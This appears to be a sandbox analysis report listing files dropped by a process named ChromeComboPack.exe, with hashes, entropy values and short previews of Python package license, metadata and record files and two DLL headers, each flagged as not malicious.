                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3575
                                                                                                                                                                                                                                            Entropy (8bit):5.085545958857746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:D0h4aC/S802Vpnu3pyt1Q+/+DeVb0ksYSwTgD:Oc/z02Vpnu3pytS+2DeVNfSwTW
                                                                                                                                                                                                                                            MD5:F659E7F578CE6FD3753871DBBBA1F939
                                                                                                                                                                                                                                            SHA1:C53B0E6A2E3D94093E2FE4978926A7439B47D43C
                                                                                                                                                                                                                                            SHA-256:508AE4FE43081C64B0B0A2828588B3A8CC3430C6693D1676662569400B0DFDB1
                                                                                                                                                                                                                                            SHA-512:2C0496B76D259259A8F1E57F3ED2224A7E3E99FF309F764C00A8377BB5BD1C94035BDDF24BD1BA637209677CB9F4E8109F84C50B3488B5B8FC372B6BEDAB9AE0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: zipp.Version: 3.19.2.Summary: Backport of pathlib-compatible object wrapper for zip files.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/zipp.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: test.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'test'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'test'.Requir
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1039
                                                                                                                                                                                                                                            Entropy (8bit):5.8094923667268965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:An/2zDlvbqfuiwbWk/EsJ6Xam9lpW8OWq3tW36nJA3u3iWwksYW:AnuXlzUuitk/5J6f9lpW8OW4tM6nJSkE
                                                                                                                                                                                                                                            MD5:1E77310EF3277C93430D969FEAC8FDFC
                                                                                                                                                                                                                                            SHA1:173240337F249E2A6D54206AA0D0ACB0FDED12D7
                                                                                                                                                                                                                                            SHA-256:F316F2E03FD9ADE7EBBC0B154706848E2BB8FD568B90935109F0D8E3CE2B9BFE
                                                                                                                                                                                                                                            SHA-512:68F752DAF2DBEB79644337E4DB9B8CEAEAE3606A865EDC32BE16785DC97BDCF38EF200F0EDC86DC9D71ABA72E108D2851A510F0EB598FFEA286503F0C9772E5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:zipp-3.19.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..zipp-3.19.2.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..zipp-3.19.2.dist-info/METADATA,sha256=UIrk_kMIHGSwsKKChYizqMw0MMZpPRZ2ZiVpQAsN_bE,3575..zipp-3.19.2.dist-info/RECORD,,..zipp-3.19.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp-3.19.2.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..zipp-3.19.2.dist-info/top_level.txt,sha256=iAbdoSHfaGqBfVb2XuR9JqSQHCoOsOtG6y9C_LSpqFw,5..zipp/__init__.py,sha256=QuI1g00G4fRAcGt-HqbV0oWIkmSgedCGGYsHHYzNa8A,13412..zipp/__pycache__/__init__.cpython-312.pyc,,..zipp/__pycache__/glob.cpython-312.pyc,,..zipp/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp/compat/__pycache__/__init__.cpython-312.pyc,,..zipp/compat/__pycache__/py310.cpython-312.pyc,,..zipp/compat/py310.py,sha256=eZpkW0zRtunkhEh8jjX3gCGe22emoKCBJw72Zt4RkhA,219..zipp/glob.py,sha256=etWpnfEoRyf
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5
                                                                                                                                                                                                                                            Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:m:m
                                                                                                                                                                                                                                            MD5:9B929466EC7848714DE24BCF75AE57CB
                                                                                                                                                                                                                                            SHA1:ECC9237295CDA9B690BE094E58FAE1458A4B0389
                                                                                                                                                                                                                                            SHA-256:8806DDA121DF686A817D56F65EE47D26A4901C2A0EB0EB46EB2F42FCB4A9A85C
                                                                                                                                                                                                                                            SHA-512:C8D8967BE2B5094A5D72BA4BEF5DBDA2CBF539BF3B8B916CF86854087A12DF82B51B7BF5B6EFA79898692EFD22FAD9688058448CAAB198FB708A0E661DC685EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:zipp.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1541912
                                                                                                                                                                                                                                            Entropy (8bit):6.576600643401234
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:8U/QhAI889YyuQYZlm/8AgzMkf6G5MJ8NW/yKhh+ivz/LZ/Xm+5D3ovTCJ7:NVyuQYZlm/8vP6G5MJ8NuF+IzDZ/XPoI
                                                                                                                                                                                                                                            MD5:956EF70F60FB099D31A79FA7334359AD
                                                                                                                                                                                                                                            SHA1:336A78492C0E10FAB4BAA0ADD7552E52F61DD110
                                                                                                                                                                                                                                            SHA-256:809C7B48B73C95B361D13C753E7A6E3C83124A27E18AAC81DF7C876F32E98E00
                                                                                                                                                                                                                                            SHA-512:7FD74B92E32A385B193264D0F08A390EEC672E508EF85BF0439BDB713A9C8909688F845BCACD4ADB3DD91B08A3EB40AE32532A08FC9378ED4530646FB871FD50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tB..,...,...,..m....,.D.-...,.D./...,.D.(...,.D.)...,..m-...,...-...,...$...,...,...,......,.......,.Rich..,.........PE..d......f.........." ...(.2...,.......1....................................................`..............................................#...&.......p...............X.../......X...0...T..............................@............P..X............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...`M...@...D..................@....pdata...............`..............@..@.rsrc........p.......>..............@..@.reloc..X............H..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1130
                                                                                                                                                                                                                                            Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                                            MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                                            SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                                            SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                                            SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                                                            Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                                            MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                                            SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                                            SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                                            SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2402
                                                                                                                                                                                                                                            Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                                            MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                                            SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                                            SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                                            SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48
                                                                                                                                                                                                                                            Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                                            MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                                            SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                                            SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                                            SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:LEJn:M
                                                                                                                                                                                                                                            MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                                            SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                                            SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                                            SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138456
                                                                                                                                                                                                                                            Entropy (8bit):5.461877321211646
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:FrEHdcM6hb/CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAa1:FrEXaCjfk7bPNfv42BN6yzUAa1
                                                                                                                                                                                                                                            MD5:B848E259FABAF32B4B3C980A0A12488D
                                                                                                                                                                                                                                            SHA1:DA2E864E18521C86C7D8968DB74BB2B28E4C23E2
                                                                                                                                                                                                                                            SHA-256:C65073B65F107E471C9BE3C699FB11F774E9A07581F41229582F7B2154B6FC3C
                                                                                                                                                                                                                                            SHA-512:4C6953504D1401FE0C74435BCEEBC5EC7BF8991FD42B659867A3529CEE5CC64DA54F1AB404E88160E747887A7409098F1A85A546BC40F12F0DDE0025408F9E27
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.@..........0*.......................................p......]M....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
